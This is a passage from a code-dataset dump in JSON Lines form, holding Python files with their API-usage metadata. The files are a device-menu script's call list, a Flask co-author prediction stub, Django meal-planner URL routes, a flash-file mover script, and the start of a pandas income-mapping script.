"name"}, {"api_name": "self.configparser.status.get", "line_number": 426, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 426, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 426, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 427, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 427, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 427, "usage_type": "name"}, {"api_name": "self.configparser.device.needs_package_update", "line_number": 428, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 428, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 428, "usage_type": "name"}, {"api_name": "self.configparser.show_claim_info_qrcode", "line_number": 434, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 434, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 437, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 437, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 438, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 438, "usage_type": "name"}, {"api_name": "self.configparser.refresh_status", "line_number": 439, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 439, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 440, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 440, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 441, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 441, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 442, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 442, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 443, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 443, "usage_type": "name"}, {"api_name": "self.configparser.show_main_menu", "line_number": 443, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 444, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 444, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 446, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 446, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 446, "usage_type": "attribute"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 447, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 447, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 447, "usage_type": "attribute"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 448, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 448, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 451, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 451, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 453, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 453, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 456, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 456, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 457, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 457, "usage_type": "name"}, {"api_name": "self.configparser.show_summary", "line_number": 457, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 458, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 458, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 460, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 460, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 461, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 461, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 465, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 465, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 466, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 466, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 467, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 467, "usage_type": "name"}, {"api_name": "self.configparser.lcd.get_status_icons_v2", "line_number": 468, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 468, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 468, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 468, "usage_type": "attribute"}, {"api_name": "self.configparser.chin", "line_number": 469, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 469, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 470, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 470, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 471, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 471, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 472, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 472, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 473, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 473, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 474, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 474, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 477, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 477, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 478, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 478, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 479, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 479, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 482, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 482, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 483, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 483, "usage_type": "name"}, {"api_name": "self.configparser.titles.insert", "line_number": 484, "usage_type": "call"}, {"api_name": "self.configparser.titles", "line_number": 484, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 484, "usage_type": "name"}, {"api_name": "self.configparser.status", "line_number": 485, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 485, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 485, "usage_type": "call"}, {"api_name": "self.configparser.status.read", "line_number": 486, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 486, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 486, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 487, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 487, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 487, "usage_type": "name"}, {"api_name": "self.configparser.lcd.get_status_icons_v2", "line_number": 488, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 488, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 488, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 488, "usage_type": "attribute"}, {"api_name": "self.configparser.lcd.show_summary", "line_number": 505, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 505, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 505, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 510, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 510, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 511, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 511, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 512, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 512, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 513, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 513, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 516, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 516, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 517, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 517, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 518, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 518, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 519, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 519, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 522, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 522, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 523, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 523, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 524, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 524, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 525, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 525, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 528, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 528, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 529, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 529, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 530, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 530, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 531, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 531, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 534, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 534, "usage_type": "name"}, {"api_name": "self.configparser.led_setting_index", "line_number": 537, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 537, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 540, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 540, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 541, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 541, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 541, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 541, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 544, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 544, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 544, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 547, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 547, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 547, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 550, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 550, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 550, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 553, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 553, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 553, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 556, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 556, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 556, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 559, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 559, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 560, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 560, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 560, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 560, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client.rainbow", "line_number": 561, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 561, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 561, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 564, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 564, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 565, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 565, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 565, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 565, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client.blank", "line_number": 566, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 566, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 566, "usage_type": "name"}, {"api_name": "self.configparser.led_client.blank", "line_number": 569, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 569, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 569, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 570, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 570, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 571, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 571, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 571, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 571, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 579, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 579, "usage_type": "name"}, {"api_name": "self.configparser.led_setting_index", "line_number": 580, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 580, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 581, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 581, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 584, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 584, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 584, "usage_type": "attribute"}, {"api_name": "self.configparser.channel", "line_number": 585, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 585, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 586, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 586, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 588, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 588, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 589, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 589, "usage_type": "name"}, {"api_name": "self.configparser.show_software_version", "line_number": 591, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 591, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 593, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 593, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 595, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 595, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 596, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 596, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 597, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 597, "usage_type": "name"}, {"api_name": "self.configparser.show_software_version", "line_number": 599, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 599, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 601, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 601, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 602, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 602, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 606, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 606, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 607, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 607, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 611, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 611, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 614, "usage_type": "call"}, {"api_name": "subprocess.CalledProcessError", "line_number": 617, "usage_type": "attribute"}, {"api_name": "self.configparser.device.get_installed_package_version", "line_number": 621, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 621, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 621, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 622, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 622, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 623, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 623, "usage_type": "name"}, {"api_name": "self.configparser.channel_update", "line_number": 623, "usage_type": "attribute"}, {"api_name": "self.configparser.render", "line_number": 624, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 624, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 627, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 627, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 628, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 628, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 629, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 629, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 630, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 630, "usage_type": "name"}, {"api_name": "self.configparser.device.software_update_blocking", "line_number": 631, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 631, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 631, "usage_type": "name"}, {"api_name": "self.configparser.lcd", "line_number": 631, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client", "line_number": 631, "usage_type": "attribute"}, {"api_name": "self.configparser.device.software_update_from_git", "line_number": 633, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 633, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 633, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 634, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 634, "usage_type": "name"}, {"api_name": "self.configparser.show_software_version", "line_number": 635, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 635, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 638, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 638, "usage_type": "name"}, {"api_name": "self.configparser.device.generate_new_config", "line_number": 641, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 641, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 641, "usage_type": "name"}, {"api_name": "self.configparser.config.read", "line_number": 642, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 642, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 642, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 643, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 643, "usage_type": "name"}, {"api_name": "self.configparser.show_claim_info", "line_number": 644, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 644, "usage_type": "name"}, {"api_name": "self.configparser.lcd.long_text", "line_number": 647, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 647, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 647, "usage_type": "name"}, {"api_name": "self.configparser.device.is_service_active", "line_number": 649, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 649, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 649, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 651, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 651, "usage_type": "name"}, {"api_name": "self.configparser.device.generate_ssh_host_keys", "line_number": 652, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 652, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 652, "usage_type": "name"}, {"api_name": "self.configparser.device.set_sshd_service", "line_number": 653, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 653, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 653, "usage_type": "name"}, {"api_name": "self.configparser.device.is_service_active", "line_number": 654, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 654, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 654, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 655, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 655, "usage_type": "name"}, {"api_name": "self.configparser.lcd.long_text", "line_number": 658, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 658, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 658, "usage_type": "name"}, {"api_name": "self.configparser.device.is_remote_session_running", "line_number": 659, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 659, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 659, "usage_type": "name"}, {"api_name": "self.configparser.device.is_service_active", "line_number": 661, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 661, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 661, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 663, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 663, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 664, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 664, "usage_type": "name"}, {"api_name": "self.configparser.device.generate_ssh_host_keys", "line_number": 665, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 665, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 665, "usage_type": "name"}, {"api_name": "self.configparser.device.set_sshd_service", "line_number": 666, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 666, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 666, "usage_type": "name"}, {"api_name": "self.configparser.device.set_remote_ssh_session", "line_number": 670, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 670, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 670, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 675, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 675, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 676, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 676, "usage_type": "name"}, {"api_name": "self.configparser.device.set_sshd_service", "line_number": 677, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 677, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 677, "usage_type": "name"}, {"api_name": "self.configparser.device.set_remote_ssh_session", "line_number": 679, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 679, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 679, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 681, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 681, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 755, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 782, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 784, "usage_type": "call"}]} +{"seq_id": "22351124965", "text": "from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef predict_coauthors():\n author_id = request.args.get('id')\n # Use your model to predict co-authors for the given author_id\n # For simplicity, we'll use dummy data here\n results = [\n {\"authorID\": \"some_author_1\", \"likeliness\": 1, \"rank\": 1},\n {\"authorID\": \"some_author_2\", \"likeliness\": 1, \"rank\": 2},\n {\"authorID\": \"some_author_3\", \"likeliness\": 1, \"rank\": 3}\n ]\n return jsonify(results)\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "bkrupam/author", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 7, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "2047252362", "text": "from django.conf.urls.defaults import *\nfrom django.views.generic.list_detail import object_list, object_detail\nfrom django.views.generic.create_update import create_object, update_object, delete_object\n\n\nfrom mealweek.models import Week\nfrom mealweek.forms import WeekForm\n\nurlpatterns = patterns('',\n\n\n url(r'^$',\n object_list,\n { 'queryset': Week.objects.all(),\n 'paginate_by': 20 },\n name='mealweek_week_list'),\n\n url(r'^create/$',\n create_object,\n { 'form_class': WeekForm,\n 'extra_context': {'operation': 'create'},\n },\n name='mealweek_week_create'),\n\n url(r'^(?P[-\\w]+)/$',\n object_detail,\n { 'queryset': Week.objects.all()},\n name='mealweek_week_detail'),\n\n url(r'^delete/(?P[-\\w]+)/$',\n delete_object,\n { 'model': Week,\n 'post_delete_redirect': '/schedule/weeks/',\n },\n name='mealweek_week_delete'),\n\n\n)\n", "repo_name": "davemckenna01/mealplanner", "sub_path": "apps/mealweek/urls/weeks.py", "file_name": "weeks.py", "file_ext": "py", "file_size_in_byte": 1383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.views.generic.list_detail.object_list", "line_number": 13, "usage_type": "argument"}, {"api_name": "mealweek.models.Week.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "mealweek.models.Week.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "mealweek.models.Week", "line_number": 14, "usage_type": "name"}, {"api_name": "django.views.generic.create_update.create_object", "line_number": 19, "usage_type": "argument"}, {"api_name": "mealweek.forms.WeekForm", "line_number": 20, "usage_type": "name"}, {"api_name": "django.views.generic.list_detail.object_detail", "line_number": 26, "usage_type": "argument"}, {"api_name": "mealweek.models.Week.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "mealweek.models.Week.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "mealweek.models.Week", "line_number": 27, "usage_type": "name"}, {"api_name": "django.views.generic.create_update.delete_object", "line_number": 31, "usage_type": "argument"}, {"api_name": "mealweek.models.Week", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "22662088785", "text": "import os\nimport shutil\nimport subprocess\nimport configparser\nfrom time import sleep\n\n# Initialize configParser # \nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\n# All Paths #\nRawFlashDir = config[\"Default\"][\"flashpath\"] + \"\\\\07_0x805EC000_PFlash.bin\"\nS19inDir = config[\"Default\"][\"s19inpath\"]\nS19outDir = config[\"Default\"][\"s19outpath\"]\nLifRootDir = config[\"Default\"][\"lifrootdir\"]\n\n# delete all files in folder which are not \"bin2s19.cmd\"\nfor file in os.listdir(S19inDir):\n print(file)\n if file != \"bin2s19.cmd\":\n os.remove(f\"{S19inDir}\\\\{file}\")\n\nshutil.copy(RawFlashDir,S19inDir) # copy raw flash file to S19in folder\nos.chdir(S19inDir) # change to S19in folder\nos.startfile(\"bin2s19.cmd\") # start first step \nos.chdir(LifRootDir) # change to Lif root folder\nsleep(0.2)\nos.startfile(\"s19lifalign.cmd\") # start second step \nsleep(0.3)\nshutil.move(S19outDir + \"\\\\07_0x805ec000_pflash_aligned.s19\", S19inDir) # Cut aligned file an putinto S19in folder\nos.chdir(S19inDir) # change to S19in folder\nos.remove(S19inDir + \"\\\\07_0x805EC000_PFlash.bin\") # remove unnecessary file\nos.remove(S19inDir + \"\\\\07_0x805EC000_PFlash.s19\") # remove unnecessary file\nos.chdir(LifRootDir) # change to Lif root folder to start eval cmd\nos.startfile(\"s19lifeval.cmd\") # start third step\n\n", "repo_name": "129marci129/VT_FlashFileMovingNew", "sub_path": "mover.py", "file_name": "mover.py", "file_ext": "py", "file_size_in_byte": 1384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 8, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 23, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 30, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 33, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 34, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "10128962019", "text": "import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\ndef map_income(income):\r\n if(income == \"under $25,000\"):\r\n return 0\r\n elif(income == \"$25,001 - $50,000\"):\r\n return 1\r\n elif(income == \"$50,000 - $74,999\"):\r\n return 2\r\n elif(income == \"$75,000 - $100,000\"):\r\n return 3\r\n elif(income == \"$100,001 - $150,000\"):\r\n return 4\r\n elif(income == \"over $150,000\"):\r\n return 5\r\n\r\ndef map_education(edu):\r\n if(edu == \"Current K-12\"):\r\n return 0\r\n elif(edu == \"High School Diploma\"):\r\n return 1\r\n elif(edu == \"Associate's Degree\"):\r\n return 2\r\n elif(edu 